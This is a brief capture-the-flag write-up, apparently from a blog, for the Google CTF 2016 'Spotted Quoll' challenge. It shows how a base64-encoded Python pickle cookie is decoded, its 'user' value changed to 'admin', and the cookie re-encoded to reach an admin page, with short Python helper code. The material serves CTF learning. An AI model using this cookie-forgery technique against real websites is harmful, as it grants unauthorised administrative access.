Google CTF 2016 // Spotted Quoll (50 points)

Capture the Flag, Google CTF 0 Comment 361

This challenge required us to get access to the admin page of a research website about zombies.


We were presented with a page containing a button that links to the website’s /admin page. Clicking this button caused the server to redirect back to the homepage and send a cookie to the browser.

The cookie’s value was:

Our first instinct was that this cookie was encoded in base64. After decoding it, we ended up with the following ascii:

This text is in the form of a Python pickle! By loading the string into a dictionary, we could manipulate the value to match the ‘user’ key. Re-encoding the pickle in base64, we managed to get access to the admin page and get our flag!

def decode(a): return pickle.loads(base64.b64decode(a))
def encode(a): return base64.b64encode(pickle.dumps(a))
a = decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")
a['user'] = 'admin'


Leave a Reply


Back to Top